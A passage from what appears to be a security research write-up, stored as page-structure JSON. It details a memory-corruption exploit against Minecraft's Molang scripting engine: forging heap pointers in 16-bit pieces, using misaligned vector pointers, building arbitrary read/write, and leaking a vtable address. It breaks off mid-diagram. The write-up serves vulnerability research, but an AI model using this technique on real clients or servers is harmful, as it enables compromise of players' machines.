",{"type":25,"tag":82,"props":157833,"children":157835},{"className":157834},[],[157836],{"type":31,"value":36719},{"type":31,"value":157838}," field of ",{"type":25,"tag":82,"props":157840,"children":157842},{"className":157841},[],[157843],{"type":31,"value":156749},{"type":31,"value":19401},{"type":25,"tag":82,"props":157846,"children":157848},{"className":157847},[],[157849],{"type":31,"value":61901},{"type":31,"value":157851},". During assignment, the upper 32 bits are not touched and therefore remain uninitialized. This can be observed in the debugger screenshot above - the 32 bits directly below the ",{"type":25,"tag":82,"props":157853,"children":157855},{"className":157854},[],[157856],{"type":31,"value":43115},{"type":31,"value":157858}," field remain unchanged before and after Molang execution.",{"type":25,"tag":38,"props":157860,"children":157861},{},[157862,157864,157869],{"type":31,"value":157863},"Because of this, we thought that we could corrupt two variables instead of just one. The plan was to modify the lower 32 bits of a variable pointer using one corrupted variable, and then restore the upper 32 bits with another corrupted variable pointing to the ",{"type":25,"tag":82,"props":157865,"children":157867},{"className":157866},[],[157868],{"type":31,"value":156857},{"type":31,"value":157870},"’s allocated buffer + 4.",{"type":25,"tag":38,"props":157872,"children":157873},{},[157874,157876,157881,157883,157888,157890,157895,157896,157902],{"type":31,"value":157875},"In the example below, ",{"type":25,"tag":82,"props":157877,"children":157879},{"className":157878},[],[157880],{"type":31,"value":157283},{"type":31,"value":157882}," points to ",{"type":25,"tag":82,"props":157884,"children":157886},{"className":157885},[],[157887],{"type":31,"value":156857},{"type":31,"value":157889},", while ",{"type":25,"tag":82,"props":157891,"children":157893},{"className":157892},[],[157894],{"type":31,"value":157297},{"type":31,"value":157882},{"type":25,"tag":82,"props":157897,"children":157899},{"className":157898},[],[157900],{"type":31,"value":157901},"MolangVariableMap + 4",{"type":31,"value":1472},{"type":25,"tag":206,"props":157904,"children":157906},{"code":157905},"                         variable.f pointer     \n                                 |              \n                   +-------------+-------------+\n                   v                           v\n                                                \n                   +-------------+-------------+\n                   | a0 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                     \n+-------------+                                 \n|    . . .    |                                 \n",[157907],{"type":25,"tag":82,"props":157908,"children":157909},{"__ignoreMap":7},[157910],{"type":31,"value":157905},{"type":25,"tag":38,"props":157912,"children":157913},{},[157914,157916,157921,157922,157927,157929,157934,157936,157941,157943,157948],{"type":31,"value":157915},"Here, the ",{"type":25,"tag":82,"props":157917,"children":157919},{"className":157918},[],[157920],{"type":31,"value":43115},{"type":31,"value":157838},{"type":25,"tag":82,"props":157923,"children":157925},{"className":157924},[],[157926],{"type":31,"value":157283},{"type":31,"value":157928}," starts at the lower 32 bits of the ",{"type":25,"tag":82,"props":157930,"children":157932},{"className":157931},[],[157933],{"type":31,"value":157353},{"type":31,"value":157935}," pointer, while ",{"type":25,"tag":82,"props":157937,"children":157939},{"className":157938},[],[157940],{"type":31,"value":157297},{"type":31,"value":157942}," starts at the upper 32 bits. This means we can store the upper 32 bits of the ",{"type":25,"tag":82,"props":157944,"children":157946},{"className":157945},[],[157947],{"type":31,"value":157353},{"type":31,"value":157949}," pointer in a separate variable:",{"type":25,"tag":206,"props":157951,"children":157953},{"code":157952},"variable.saved_upper_32 = variable.b;\n",[157954],{"type":25,"tag":82,"props":157955,"children":157956},{"__ignoreMap":7},[157957],{"type":31,"value":157952},{"type":25,"tag":38,"props":157959,"children":157960},{},[157961],{"type":31,"value":157962},"Then we can modify the lower 32 bits of the pointer:",{"type":25,"tag":206,"props":157964,"children":157966},{"code":157965},"variable.a = variable.a + itof(0x8);\n",[157967],{"type":25,"tag":82,"props":157968,"children":157969},{"__ignoreMap":7},[157970],{"type":31,"value":157965},{"type":25,"tag":38,"props":157972,"children":157973},{},[157974],{"type":31,"value":157975},"After this operation, the upper 32 bits are cleared while the lower bits are adjusted:",{"type":25,"tag":206,"props":157977,"children":157979},{"code":157978},"                   +-------------+-------------+\n                   | a8 bb cc dd | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                     \n+-------------+                                 \n|    . . .    |                                 \n",[157980],{"type":25,"tag":82,"props":157981,"children":157982},{"__ignoreMap":7},[157983],{"type":31,"value":157978},{"type":25,"tag":38,"props":157985,"children":157986},{},[157987,157989,157994],{"type":31,"value":157988},"Since the 32 bits directly below the ",{"type":25,"tag":82,"props":157990,"children":157992},{"className":157991},[],[157993],{"type":31,"value":43115},{"type":31,"value":157995}," field remain untouched during assignment, we can simply restore the upper bits:",{"type":25,"tag":206,"props":157997,"children":157999},{"code":157998},"variable.b = variable.saved_upper_32;\n",[158000],{"type":25,"tag":82,"props":158001,"children":158002},{"__ignoreMap":7},[158003],{"type":31,"value":157998},{"type":25,"tag":38,"props":158005,"children":158006},{},[158007,158009,158014],{"type":31,"value":158008},"Now ",{"type":25,"tag":82,"props":158010,"children":158012},{"className":158011},[],[158013],{"type":31,"value":157353},{"type":31,"value":158015}," pointer is restored and we've incremented it by 8, achieving the desired state:",{"type":25,"tag":206,"props":158017,"children":158019},{"code":158018},"                   +-------------+-------------+\n                   | a8 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^             ^             \n+-------------+     |             |             \n| variable.a  +-----+             |             \n+-------------+                   |             \n| variable.b  +-------------------+                                    \n+-------------+                                 \n|    . . .    |                                 \n",[158020],{"type":25,"tag":82,"props":158021,"children":158022},{"__ignoreMap":7},[158023],{"type":31,"value":158018},{"type":25,"tag":38,"props":158025,"children":158026},{},[158027,158029,158034],{"type":31,"value":158028},"This bypasses the issue of the upper 32 bits being cleared, but raises another question: how do we find a pointer to ",{"type":25,"tag":82,"props":158030,"children":158032},{"className":158031},[],[158033],{"type":31,"value":157901},{"type":31,"value":158035}," on the heap?",{"type":25,"tag":38,"props":158037,"children":158038},{},[158039,158041,158046,158048,158054],{"type":31,"value":158040},"Additionally, adding 8 to ",{"type":25,"tag":82,"props":158042,"children":158044},{"className":158043},[],[158045],{"type":31,"value":157283},{"type":31,"value":158047}," in the example above wouldn’t work because ",{"type":25,"tag":82,"props":158049,"children":158051},{"className":158050},[],[158052],{"type":31,"value":158053},"0xddccbba0",{"type":31,"value":158055}," is not a valid float. So the first issue still remains unresolved.",{"type":25,"tag":630,"props":158057,"children":158059},{"id":158058},"the-final-approach",[158060],{"type":31,"value":158061},"The Final Approach",{"type":25,"tag":38,"props":158063,"children":158064},{},[158065,158067,158072,158074,158080],{"type":31,"value":158066},"We realized that instead of having the second pointer at ",{"type":25,"tag":82,"props":158068,"children":158070},{"className":158069},[],[158071],{"type":31,"value":157901},{"type":31,"value":158073},", we could instead have it at ",{"type":25,"tag":82,"props":158075,"children":158077},{"className":158076},[],[158078],{"type":31,"value":158079},"MolangVariableMap + 2",{"type":31,"value":158081},", which would resolve both of our issues.",{"type":25,"tag":38,"props":158083,"children":158084},{},[158085,158087,158092,158093,158098],{"type":31,"value":158086},"Let’s revisit the previous example, but this time ",{"type":25,"tag":82,"props":158088,"children":158090},{"className":158089},[],[158091],{"type":31,"value":157297},{"type":31,"value":157882},{"type":25,"tag":82,"props":158094,"children":158096},{"className":158095},[],[158097],{"type":31,"value":158079},{"type":31,"value":1472},{"type":25,"tag":206,"props":158100,"children":158102},{"code":158101},"                   +-------------+-------------+\n                   | a0 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                             \n+-------------+                                 \n|    . . .    |                                 \n",[158103],{"type":25,"tag":82,"props":158104,"children":158105},{"__ignoreMap":7},[158106],{"type":31,"value":158101},{"type":25,"tag":38,"props":158108,"children":158109},{},[158110,158112,158117],{"type":31,"value":158111},"With this setup, we can calculate any address relative to ",{"type":25,"tag":82,"props":158113,"children":158115},{"className":158114},[],[158116],{"type":31,"value":157353},{"type":31,"value":158118}," by first saving the upper 48 bits of the address:",{"type":25,"tag":206,"props":158120,"children":158122},{"code":158121},"variable.saved_upper_48 = variable.b;\n",[158123],{"type":25,"tag":82,"props":158124,"children":158125},{"__ignoreMap":7},[158126],{"type":31,"value":158121},{"type":25,"tag":38,"props":158128,"children":158129},{},[158130,158131,158137,158139,158145],{"type":31,"value":133762},{"type":25,"tag":82,"props":158132,"children":158134},{"className":158133},[],[158135],{"type":31,"value":158136},"variable.saved_upper_48",{"type":31,"value":158138}," holds the value ",{"type":25,"tag":82,"props":158140,"children":158142},{"className":158141},[],[158143],{"type":31,"value":158144},"0x1c80ddcc",{"type":31,"value":179},{"type":25,"tag":38,"props":158147,"children":158148},{},[158149],{"type":31,"value":158150},"To fix our earlier problem of being unable to increment invalid float values, we can simply clear the upper 48 bits:",{"type":25,"tag":206,"props":158152,"children":158154},{"code":158153},"variable.b = 0;\n",[158155],{"type":25,"tag":82,"props":158156,"children":158157},{"__ignoreMap":7},[158158],{"type":31,"value":158153},{"type":25,"tag":38,"props":158160,"children":158161},{},[158162],{"type":31,"value":158163},"Resulting in the following state:",{"type":25,"tag":206,"props":158165,"children":158167},{"code":158166},"                   +-------------+-------------+\n                   | a0 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                            \n+-------------+                                 \n|    . . .    |                                 \n",[158168],{"type":25,"tag":82,"props":158169,"children":158170},{"__ignoreMap":7},[158171],{"type":31,"value":158166},{"type":25,"tag":38,"props":158173,"children":158174},{},[158175,158177,158182,158184,158190,158192,158197],{"type":31,"value":158176},"Now, the value of ",{"type":25,"tag":82,"props":158178,"children":158180},{"className":158179},[],[158181],{"type":31,"value":157283},{"type":31,"value":158183}," only spans 16 bits (",{"type":25,"tag":82,"props":158185,"children":158187},{"className":158186},[],[158188],{"type":31,"value":158189},"0xbba0",{"type":31,"value":158191}," specifically), which is always a valid float since it’s far below ",{"type":25,"tag":82,"props":158193,"children":158195},{"className":158194},[],[158196],{"type":31,"value":157781},{"type":31,"value":179},{"type":25,"tag":38,"props":158199,"children":158200},{},[158201,158203,158208],{"type":31,"value":158202},"We can now safely adjust the lower 16 bits of the pointer by incrementing ",{"type":25,"tag":82,"props":158204,"children":158206},{"className":158205},[],[158207],{"type":31,"value":157283},{"type":31,"value":1472},{"type":25,"tag":206,"props":158210,"children":158211},{"code":157965},[158212],{"type":25,"tag":82,"props":158213,"children":158214},{"__ignoreMap":7},[158215],{"type":31,"value":157965},{"type":25,"tag":38,"props":158217,"children":158218},{},[158219],{"type":31,"value":158220},"Which results in:",{"type":25,"tag":206,"props":158222,"children":158224},{"code":158223},"                   +-------------+-------------+\n                   | a8 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                            \n+-------------+                                 \n|    . . .    |                                 \n",[158225],{"type":25,"tag":82,"props":158226,"children":158227},{"__ignoreMap":7},[158228],{"type":31,"value":158223},{"type":25,"tag":38,"props":158230,"children":158231},{},[158232],{"type":31,"value":158233},"If we only wanted to increment the pointer by 8, we could finish by restoring the upper 48 bits:",{"type":25,"tag":206,"props":158235,"children":158237},{"code":158236},"variable.b = variable.saved_upper_48;\n",[158238],{"type":25,"tag":82,"props":158239,"children":158240},{"__ignoreMap":7},[158241],{"type":31,"value":158236},{"type":25,"tag":38,"props":158243,"children":158244},{},[158245],{"type":31,"value":158246},"Yielding a valid pointer again:",{"type":25,"tag":206,"props":158248,"children":158250},{"code":158249},"                   +-------------+-------------+\n                   | a8 bb cc dd | 80 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                                             \n+-------------+                                 \n|    . . .    |                                 \n",[158251],{"type":25,"tag":82,"props":158252,"children":158253},{"__ignoreMap":7},[158254],{"type":31,"value":158249},{"type":25,"tag":38,"props":158256,"children":158257},{},[158258],{"type":31,"value":158259},"However, if we wanted to increment the pointer by a value larger than 16 bits can represent, we would continue by first saving the adjusted lower 16 bits:",{"type":25,"tag":206,"props":158261,"children":158263},{"code":158262},"variable.saved_adjusted_lower_16 = variable.a;\n",[158264],{"type":25,"tag":82,"props":158265,"children":158266},{"__ignoreMap":7},[158267],{"type":31,"value":158262},{"type":25,"tag":38,"props":158269,"children":158270},{},[158271],{"type":31,"value":158272},"Next, we need to extract the middle and upper 16 bits of the address. We start by restoring the previously saved upper 48 bits:",{"type":25,"tag":206,"props":158274,"children":158276},{"code":158275},"variable.a = variable.saved_upper_48;\n",[158277],{"type":25,"tag":82,"props":158278,"children":158279},{"__ignoreMap":7},[158280],{"type":31,"value":158275},{"type":25,"tag":38,"props":158282,"children":158283},{},[158284],{"type":31,"value":158285},"This produces the following state:",{"type":25,"tag":206,"props":158287,"children":158289},{"code":158288},"                   +-------------+-------------+\n                   | cc dd 80 1c | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    |                                 \n",[158290],{"type":25,"tag":82,"props":158291,"children":158292},{"__ignoreMap":7},[158293],{"type":31,"value":158288},{"type":25,"tag":38,"props":158295,"children":158296},{},[158297,158299,158304,158306,158312,158314,158320,158322,158327,158329,158334],{"type":31,"value":158298},"As shown, ",{"type":25,"tag":82,"props":158300,"children":158302},{"className":158301},[],[158303],{"type":31,"value":157297},{"type":31,"value":158305}," now contains the upper 16 bits of the address (",{"type":25,"tag":82,"props":158307,"children":158309},{"className":158308},[],[158310],{"type":31,"value":158311},"0x1c80",{"type":31,"value":158313},"), which we can store as ",{"type":25,"tag":82,"props":158315,"children":158317},{"className":158316},[],[158318],{"type":31,"value":158319},"variable.saved_upper_16 = variable.b",{"type":31,"value":158321},". Meanwhile, ",{"type":25,"tag":82,"props":158323,"children":158325},{"className":158324},[],[158326],{"type":31,"value":157283},{"type":31,"value":158328}," contains both the middle and upper 16 bits. To isolate the middle bits, we simply clear ",{"type":25,"tag":82,"props":158330,"children":158332},{"className":158331},[],[158333],{"type":31,"value":157297},{"type":31,"value":1472},{"type":25,"tag":206,"props":158336,"children":158337},{"code":158153},[158338],{"type":25,"tag":82,"props":158339,"children":158340},{"__ignoreMap":7},[158341],{"type":31,"value":158153},{"type":25,"tag":38,"props":158343,"children":158344},{},[158345],{"type":31,"value":158346},"Leaving us with:",{"type":25,"tag":206,"props":158348,"children":158350},{"code":158349},"                   +-------------+-------------+\n                   | cc dd 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    |                                 \n",[158351],{"type":25,"tag":82,"props":158352,"children":158353},{"__ignoreMap":7},[158354],{"type":31,"value":158349},{"type":25,"tag":38,"props":158356,"children":158357},{},[158358],{"type":31,"value":158359},"We can now save the middle 16 bits:",{"type":25,"tag":206,"props":158361,"children":158363},{"code":158362},"variable.saved_middle_16 = variable.a;\n",[158364],{"type":25,"tag":82,"props":158365,"children":158366},{"__ignoreMap":7},[158367],{"type":31,"value":158362},{"type":25,"tag":38,"props":158369,"children":158370},{},[158371],{"type":31,"value":158372},"At this point, we have:",{"type":25,"tag":206,"props":158374,"children":158376},{"code":158375},"variable.saved_adjusted_lower_16 = 0xbba8\nvariable.saved_middle_16 = 0xddcc\nvariable.saved_upper_16 = 0x1c80\n",[158377],{"type":25,"tag":82,"props":158378,"children":158379},{"__ignoreMap":7},[158380],{"type":31,"value":158375},{"type":25,"tag":38,"props":158382,"children":158383},{},[158384],{"type":31,"value":158385},"All three parts are valid float values, ensuring deterministic calculations.",{"type":25,"tag":38,"props":158387,"children":158388},{},[158389],{"type":31,"value":158390},"If we needed to increment the pointer by more than the maximum 16-bit value, we would simply increment the middle and upper parts accordingly:",{"type":25,"tag":206,"props":158392,"children":158394},{"code":158393},"variable.saved_adjusted_middle_16 = variable.saved_middle_16 + itof(0x1);\nvariable.saved_adjusted_upper_16 = variable.saved_upper_16 + itof(0x1);\n",[158395],{"type":25,"tag":82,"props":158396,"children":158397},{"__ignoreMap":7},[158398],{"type":31,"value":158393},{"type":25,"tag":38,"props":158400,"children":158401},{},[158402],{"type":31,"value":158403},"After modifying the three 16-bit parts, we can reconstruct the full pointer by reversing the extraction process. We start by forging the upper 48 bits:",{"type":25,"tag":206,"props":158405,"children":158407},{"code":158406},"variable.a = variable.saved_adjusted_middle_16;\n",[158408],{"type":25,"tag":82,"props":158409,"children":158410},{"__ignoreMap":7},[158411],{"type":31,"value":158406},{"type":25,"tag":38,"props":158413,"children":158414},{},[158415,158417,158422,158423,158429,158430,158436],{"type":31,"value":158416},"Setting ",{"type":25,"tag":82,"props":158418,"children":158420},{"className":158419},[],[158421],{"type":31,"value":157283},{"type":31,"value":60744},{"type":25,"tag":82,"props":158424,"children":158426},{"className":158425},[],[158427],{"type":31,"value":158428},"0xddcd",{"type":31,"value":7016},{"type":25,"tag":82,"props":158431,"children":158433},{"className":158432},[],[158434],{"type":31,"value":158435},"0xddcc + 1",{"type":31,"value":158437},"), and then:",{"type":25,"tag":206,"props":158439,"children":158441},{"code":158440},"variable.b = variable.saved_adjusted_upper_16;\n",[158442],{"type":25,"tag":82,"props":158443,"children":158444},{"__ignoreMap":7},[158445],{"type":31,"value":158440},{"type":25,"tag":38,"props":158447,"children":158448},{},[158449,158451,158456,158458,158464,158465,158471],{"type":31,"value":158450},"Resulting in ",{"type":25,"tag":82,"props":158452,"children":158454},{"className":158453},[],[158455],{"type":31,"value":157297},{"type":31,"value":158457}," value becoming ",{"type":25,"tag":82,"props":158459,"children":158461},{"className":158460},[],[158462],{"type":31,"value":158463},"0x1c81",{"type":31,"value":7016},{"type":25,"tag":82,"props":158466,"children":158468},{"className":158467},[],[158469],{"type":31,"value":158470},"0x1c80 + 1",{"type":31,"value":27903},{"type":25,"tag":206,"props":158473,"children":158475},{"code":158474},"                   +-------------+-------------+\n                   | cd dd 81 1c | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[158476],{"type":25,"tag":82,"props":158477,"children":158478},{"__ignoreMap":7},[158479],{"type":31,"value":158474},{"type":25,"tag":38,"props":158481,"children":158482},{},[158483],{"type":31,"value":158484},"Now we save the adjusted upper 48 bits:",{"type":25,"tag":206,"props":158486,"children":158488},{"code":158487},"variable.saved_adjusted_upper_48 = variable.a;\n",[158489],{"type":25,"tag":82,"props":158490,"children":158491},{"__ignoreMap":7},[158492],{"type":31,"value":158487},{"type":25,"tag":38,"props":158494,"children":158495},{},[158496],{"type":31,"value":158497},"Finally, we attach the lower 16 bits:",{"type":25,"tag":206,"props":158499,"children":158501},{"code":158500},"variable.a = variable.saved_adjusted_lower_16;\n",[158502],{"type":25,"tag":82,"props":158503,"children":158504},{"__ignoreMap":7},[158505],{"type":31,"value":158500},{"type":25,"tag":206,"props":158507,"children":158509},{"code":158508},"                   +-------------+-------------+\n                   | a8 bb 00 00 | 00 00 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[158510],{"type":25,"tag":82,"props":158511,"children":158512},{"__ignoreMap":7},[158513],{"type":31,"value":158508},{"type":25,"tag":38,"props":158515,"children":158516},{},[158517],{"type":31,"value":158518},"And by setting:",{"type":25,"tag":206,"props":158520,"children":158522},{"code":158521},"variable.b = variable.saved_adjusted_upper_48;\n",[158523],{"type":25,"tag":82,"props":158524,"children":158525},{"__ignoreMap":7},[158526],{"type":31,"value":158521},{"type":25,"tag":38,"props":158528,"children":158529},{},[158530],{"type":31,"value":158531},"We forge the final adjusted pointer:",{"type":25,"tag":206,"props":158533,"children":158535},{"code":158534},"                   +-------------+-------------+\n                   | a8 bb cd dd | 81 1c 00 00 |\n                   +-------------+-------------+\n                    ^     ^                     \n+-------------+     |     |                     \n| variable.a  +-----+     |                     \n+-------------+           |                     \n| variable.b  +-----------+                     \n+-------------+                                 \n|    . . .    | \n",[158536],{"type":25,"tag":82,"props":158537,"children":158538},{"__ignoreMap":7},[158539],{"type":31,"value":158534},{"type":25,"tag":22753,"props":158541,"children":158542},{},[],{"type":25,"tag":38,"props":158544,"children":158545},{},[158546,158548,158553],{"type":31,"value":158547},"With this, we now have a method to calculate any pointer we want. However, the previous question still remains: how do we find a pointer to ",{"type":25,"tag":82,"props":158549,"children":158551},{"className":158550},[],[158552],{"type":31,"value":158079},{"type":31,"value":158035},{"type":25,"tag":38,"props":158555,"children":158556},{},[158557,158559,158564,158566,158571,158573,158579,158581,158586],{"type":31,"value":158558},"Eventually, we realized that we don’t necessarily need a pointer to ",{"type":25,"tag":82,"props":158560,"children":158562},{"className":158561},[],[158563],{"type":31,"value":158079},{"type":31,"value":158565},". Instead, we need any two pointers on the heap - one pointing to ",{"type":25,"tag":82,"props":158567,"children":158569},{"className":158568},[],[158570],{"type":31,"value":34648},{"type":31,"value":158572}," and the other to ",{"type":25,"tag":82,"props":158574,"children":158576},{"className":158575},[],[158577],{"type":31,"value":158578},"addr + 2",{"type":31,"value":158580}," (as long as ",{"type":25,"tag":82,"props":158582,"children":158584},{"className":158583},[],[158585],{"type":31,"value":34648},{"type":31,"value":158587}," lies within a writable region). The idea is to use these two pointers as a workspace where we can split, manipulate, and reconstruct a pointer.",{"type":25,"tag":38,"props":158589,"children":158590},{},[158591,158593,158598,158599,158604],{"type":31,"value":158592},"In this case, we need to corrupt an index of an additional (third) variable and make it index the ",{"type":25,"tag":82,"props":158594,"children":158596},{"className":158595},[],[158597],{"type":31,"value":154053},{"type":31,"value":157838},{"type":25,"tag":82,"props":158600,"children":158602},{"className":158601},[],[158603],{"type":31,"value":156857},{"type":31,"value":158605}," - once the new pointer is forged we can use this variable to assign it the forged pointer:",{"type":25,"tag":206,"props":158607,"children":158609},{"code":158608},"variable.corrupted_var_map_ptr = variable.a;\n",[158610],{"type":25,"tag":82,"props":158611,"children":158612},{"__ignoreMap":7},[158613],{"type":31,"value":158608},{"type":25,"tag":38,"props":158615,"children":158616},{},[158617,158619,158624,158626,158632],{"type":31,"value":158618},"As mentioned earlier, this operation copies the entire 64-bit ",{"type":25,"tag":82,"props":158620,"children":158622},{"className":158621},[],[158623],{"type":31,"value":43115},{"type":31,"value":158625}," field (in this case, the reconstructed pointer) and writes it to ",{"type":25,"tag":82,"props":158627,"children":158629},{"className":158628},[],[158630],{"type":31,"value":158631},"variable.corrupted_var_map_ptr",{"type":31,"value":158633},", even though the type itself is only a 32-bit float.",{"type":25,"tag":630,"props":158635,"children":158637},{"id":158636},"finding-misaligned-pointers",[158638],{"type":31,"value":158639},"Finding Misaligned Pointers",{"type":25,"tag":38,"props":158641,"children":158642},{},[158643,158645,158650,158651,158657],{"type":31,"value":158644},"This step requires a heap-sprayable structure that contains two pointers separated by two bytes (",{"type":25,"tag":82,"props":158646,"children":158648},{"className":158647},[],[158649],{"type":31,"value":17906},{"type":31,"value":1307},{"type":25,"tag":82,"props":158652,"children":158654},{"className":158653},[],[158655],{"type":31,"value":158656},"ptr + 2",{"type":31,"value":158658},"). Fortunately, we didn’t have to look far as we were already familiar with a suitable structure.",{"type":25,"tag":38,"props":158660,"children":158661},{},[158662,158667,158668,158673,158675,158680,158682,158687,158689,158694,158696,158701,158703,158709,158710,158715],{"type":25,"tag":82,"props":158663,"children":158665},{"className":158664},[],[158666],{"type":31,"value":157033},{"type":31,"value":19401},{"type":25,"tag":82,"props":158669,"children":158671},{"className":158670},[],[158672],{"type":31,"value":157056},{"type":31,"value":158674}," found inside every entity object. As noted earlier, a ",{"type":25,"tag":82,"props":158676,"children":158678},{"className":158677},[],[158679],{"type":31,"value":156887},{"type":31,"value":158681}," contains three pointers: ",{"type":25,"tag":82,"props":158683,"children":158685},{"className":158684},[],[158686],{"type":31,"value":154053},{"type":31,"value":158688}," (the start of the allocated buffer), ",{"type":25,"tag":82,"props":158690,"children":158692},{"className":158691},[],[158693],{"type":31,"value":13094},{"type":31,"value":158695}," (just past the last element) and ",{"type":25,"tag":82,"props":158697,"children":158699},{"className":158698},[],[158700],{"type":31,"value":156986},{"type":31,"value":158702}," (the end of the allocated buffer). Because the element type is ",{"type":25,"tag":82,"props":158704,"children":158706},{"className":158705},[],[158707],{"type":31,"value":158708},"uint16_t",{"type":31,"value":106255},{"type":25,"tag":82,"props":158711,"children":158713},{"className":158712},[],[158714],{"type":31,"value":13094},{"type":31,"value":158716}," pointer advances by 2 bytes each time a new element is added.",{"type":25,"tag":38,"props":158718,"children":158719},{},[158720,158722,158727,158729,158735],{"type":31,"value":158721},"We can make the ",{"type":25,"tag":82,"props":158723,"children":158725},{"className":158724},[],[158726],{"type":31,"value":13094},{"type":31,"value":158728}," pointer equal to ",{"type":25,"tag":82,"props":158730,"children":158732},{"className":158731},[],[158733],{"type":31,"value":158734},"cap - 2",{"type":31,"value":158736}," by adding elements until the vector is one element short of full. In practice this is done by filling the entity with previously unseen variables.",{"type":25,"tag":206,"props":158738,"children":158740},{"code":158739},"                         +-> +---------------+\n                         |   |               |\n                         |   |     . . .     |\n                         |   |               |\n                         |   +-------+-------+\n                         |   | 00 f0 | 00 f1 |\n                         |   +-------+-------+\n                         |   | 00 f2 | 00 f3 |\n                         |   +-------+-------+\n  std::vector\u003Cuint16_t>  |   | 00 f4 | 00 f5 |\n     MolangIndexMap      |   +-------+-------+\n    +----------------+   |   | 00 f6 | 00 00 |\nbuf | 0x1c54f7a13200 | --+   +-------+-------+\n    +----------------+               ^       ^\nlen | 0x1c54f7a13306 | --------------+       |\n    +----------------+                       |\ncap | 0x1c54f7a13308 | ----------------------+\n    +----------------+                        \n",[158741],{"type":25,"tag":82,"props":158742,"children":158743},{"__ignoreMap":7},[158744],{"type":31,"value":158739},{"type":25,"tag":22753,"props":158746,"children":158747},{},[],{"type":25,"tag":38,"props":158749,"children":158750},{},[158751,158753,158758,158760,158765,158767,158772,158774,158779,158780,158785],{"type":31,"value":158752},"To summarize - the final setup will require overwriting indices of three variables: one that would index the ",{"type":25,"tag":82,"props":158754,"children":158756},{"className":158755},[],[158757],{"type":31,"value":154053},{"type":31,"value":158759}," pointer of ",{"type":25,"tag":82,"props":158761,"children":158763},{"className":158762},[],[158764],{"type":31,"value":156857},{"type":31,"value":158766}," in the entity object above, one that would index ",{"type":25,"tag":82,"props":158768,"children":158770},{"className":158769},[],[158771],{"type":31,"value":13094},{"type":31,"value":158773}," and the final ",{"type":25,"tag":82,"props":158775,"children":158777},{"className":158776},[],[158778],{"type":31,"value":156986},{"type":31,"value":158759},{"type":25,"tag":82,"props":158781,"children":158783},{"className":158782},[],[158784],{"type":31,"value":157033},{"type":31,"value":158786}," also in the same entity object above.",{"type":25,"tag":38,"props":158788,"children":158789},{},[158790,158792,158798,158799,158805,158807,158812,158813,158818,158820,158825,158827,158832,158833,158838,158840,158845],{"type":31,"value":158791},"The corrupted variables ",{"type":25,"tag":82,"props":158793,"children":158795},{"className":158794},[],[158796],{"type":31,"value":158797},"variable.corrupted_len_ptr",{"type":31,"value":1307},{"type":25,"tag":82,"props":158800,"children":158802},{"className":158801},[],[158803],{"type":31,"value":158804},"variable.corrupted_cap_ptr",{"type":31,"value":158806}," point to ",{"type":25,"tag":82,"props":158808,"children":158810},{"className":158809},[],[158811],{"type":31,"value":13094},{"type":31,"value":1307},{"type":25,"tag":82,"props":158814,"children":158816},{"className":158815},[],[158817],{"type":31,"value":156986},{"type":31,"value":158819},", respectively - they are two bytes apart. With these two we can compute arbitrary pointers using the method previously described. The third corrupted variable, ",{"type":25,"tag":82,"props":158821,"children":158823},{"className":158822},[],[158824],{"type":31,"value":158631},{"type":31,"value":158826},", points to the ",{"type":25,"tag":82,"props":158828,"children":158830},{"className":158829},[],[158831],{"type":31,"value":154053},{"type":31,"value":157838},{"type":25,"tag":82,"props":158834,"children":158836},{"className":158835},[],[158837],{"type":31,"value":156857},{"type":31,"value":158839},"; it is used to copy the calculated pointer into the allocated buffer of ",{"type":25,"tag":82,"props":158841,"children":158843},{"className":158842},[],[158844],{"type":31,"value":156857},{"type":31,"value":158846},", which in turn lets us overwrite a pointer of a different (fourth) variable. That fourth corrupted variable is what we ultimately use for arbitrary read/write.",{"type":25,"tag":38,"props":158848,"children":158849},{},[158850],{"type":31,"value":158851},"Before we can do any arbitrary memory operations, however, we need a leak - ideally the address of any Minecraft executable region - that lets us perform arbitrary reads and writes into the target memory region.",{"type":25,"tag":630,"props":158853,"children":158855},{"id":158854},"leaking-pointers",[158856],{"type":31,"value":158857},"Leaking Pointers",{"type":25,"tag":38,"props":158859,"children":158860},{},[158861,158863,158869],{"type":31,"value":158862},"In C++, an object’s first field is typically a ",{"type":25,"tag":82,"props":158864,"children":158866},{"className":158865},[],[158867],{"type":31,"value":158868},"vtable",{"type":31,"value":158870}," pointer - a pointer into a read-only region of the executable in memory. That means the first field of the entity object contains an address inside the Minecraft executable, and we want to recover that value from our Molang script.",{"type":25,"tag":206,"props":158872,"children":158874},{"code":158873},"                                 Entity Object       \n                                                     \n                          +------------+------------+\n                          | vtable ptr |            |\n                          +------------+            |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                          |                         |\n                      